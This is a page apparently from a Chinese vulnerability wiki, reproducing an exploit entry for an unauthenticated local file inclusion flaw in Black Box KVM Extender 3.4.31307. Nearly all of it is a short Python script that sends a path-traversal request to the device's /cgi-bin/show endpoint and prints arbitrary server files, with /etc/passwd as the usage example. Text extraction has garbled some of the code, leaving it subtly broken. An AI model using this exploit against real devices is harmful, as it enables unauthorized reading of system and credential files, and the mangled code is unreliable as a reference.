PWNWIK.COM
,
# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion # Date: 05.07.2021 # Exploit Author: Ferhat Çil # Vendor Homepage: http://www.blackbox.com/ # Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm # Version: 3.4.31307 # Category: Webapps # Tested on: Linux # Description: Any user can read files from the server # without authentication due to an existing LFI in the following path: # http://target//cgi-bin/show?page=FilePath import requests import sys if name == 'main': if len(sys.argv) == 3: url = sys.argv1 payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv2 r = requests.get(payload) print(r.text) else: print("Usage: " + sys.argv0 + ' http://example.com/ /etc/passwd')
免费、自由、人人可编辑的漏洞库